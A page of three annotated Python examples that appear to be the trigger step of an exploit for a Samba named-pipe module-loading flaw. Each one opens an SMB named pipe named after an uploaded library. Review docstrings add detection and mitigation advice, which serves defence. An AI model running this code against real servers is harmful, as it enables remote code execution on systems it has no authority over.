예제 #1
 def load_exp(self):
   """Stage a library with copy_lib() and open a DCE/RPC named-pipe connection to it.

   The pipe name placed in the ncacn_np string binding is whatever
   copy_lib() returns, not a fixed well-known RPC endpoint name. The
   connection reuses the existing SMB session held in self.smb. Nothing is
   returned and no exception is handled here, so an error from connect()
   propagates to the caller.

   NOTE(review): lib_name is neither a parameter nor a local of this
   method; presumably a module-level name - confirm.
   NOTE(review): transport looks like impacket's DCE/RPC transport module -
   confirm against the file's imports.

   Defensive reading: on the server this appears as a named-pipe open over
   SMB whose pipe name is the name or path of a file that copy_lib()
   presumably wrote to a share just before. A file write followed by a pipe
   open naming that same file is the sequence to alert on.
   NOTE(review): if the server is Samba, this resembles the known
   "pipe name resolved as a shared-object path" issue; the usual hardening
   there is a patched release plus `nt pipe support = no` where RPC pipes
   are not needed - confirm against the vendor advisory.
   """
   lib_path = self.copy_lib(lib_name)
   skull = emoji.emojize(':skull:')
   print("[ " + skull + " ] Loading evil module [ " + skull + " ]")
   # The staged library name is used verbatim as the pipe name.
   binding = transport.DCERPCStringBinding(r'ncacn_np:%s[\pipe\%s]'% (self.rhost, lib_path))
   host = binding.get_network_address()
   # Reuse the authenticated SMB session instead of opening a new one.
   smb_transport = transport.SMBTransport(host, filename = lib_path, smb_connection = self.smb)
   rpc = smb_transport.get_dce_rpc()
   rpc.connect()
예제 #2
  def load_module(self, module):
    """Try to open a DCE/RPC named-pipe connection whose pipe name is `module`.

    Builds an ncacn_np string binding for self.target with `module` as the
    pipe name, wraps the existing SMB session (self.smb) in an SMB
    transport, and calls connect().

    Returns:
      True if connect() completes without raising; False if it raises
      anything other than KeyboardInterrupt (the error text is logged).

    On KeyboardInterrupt the process prints "Aborted." and exits with
    status 0. The bare `except:` also catches SystemExit and other
    BaseException subclasses raised inside connect().

    Defensive reading: the observable on the server is a named-pipe open
    over SMB where the pipe name is caller-controlled (here `module`)
    rather than a known RPC endpoint. Logging and alerting on pipe names
    that contain path separators or match recently written share files
    covers this pattern.
    NOTE(review): transport is presumably impacket's DCE/RPC transport
    module and log a file-level helper - confirm against the full file.
    """
    log("Trying to load module %s" % module)
    binding = transport.DCERPCStringBinding(r'ncacn_np:%s[\pipe\%s]' % (self.target, module))
    host = binding.get_network_address()
    # Reuse the authenticated SMB session rather than opening a new one.
    smb_transport = transport.SMBTransport(host, filename = module, smb_connection = self.smb)
    rpc = smb_transport.get_dce_rpc()

    try:
      rpc.connect()
    except KeyboardInterrupt:
      print("Aborted.")
      sys.exit(0)
    except:
      # Any other failure is reported through log() and mapped to False.
      failure = sys.exc_info()[1]
      log("Error: %s" % str(failure))
      return False
    else:
      return True
예제 #3
def do_exploit(module, rhost, smb_connection):
    """Try to open a DCE/RPC named-pipe connection to `rhost` using `module` as the pipe name.

    Args:
        module: value used verbatim as the pipe name in the string binding
            and as the SMB transport's filename.
        rhost: host placed in the ncacn_np string binding.
        smb_connection: existing SMB session that the transport reuses.

    Returns:
        True if connect() completes without raising, otherwise False.

    Every exception from connect() is swallowed by a bare `except:`,
    including KeyboardInterrupt and SystemExit, and nothing is logged about
    it. The original author's comment says connect() raises every time for
    reasons they did not investigate, so the return value is not a reliable
    signal of what the server did with the request.

    Defensive reading: server-side, this is a named-pipe open over SMB with
    a caller-chosen pipe name. Detection should key on pipe names that are
    not known RPC endpoints, especially ones resembling file paths.
    NOTE(review): if the server is Samba, compare with the vendor advisory
    for module loading via pipe names; fixed releases and
    `nt pipe support = no` are the usual mitigations - confirm.
    NOTE(review): transport is presumably impacket's DCE/RPC transport
    module and log a file-level helper - confirm against the full file.
    """
    log("Trying to load module %s" % module)
    binding = transport.DCERPCStringBinding(
        r'ncacn_np:%s[\pipe\%s]' % (rhost, module))
    host = binding.get_network_address()
    smb_transport = transport.SMBTransport(
        host, filename=module, smb_connection=smb_connection)
    rpc = smb_transport.get_dce_rpc()

    connected = False
    try:
        rpc.connect()
        connected = True
    except:
        # Translated from the original: "Not sure why this always raises
        # an exception, but we ignore it."
        pass

    return connected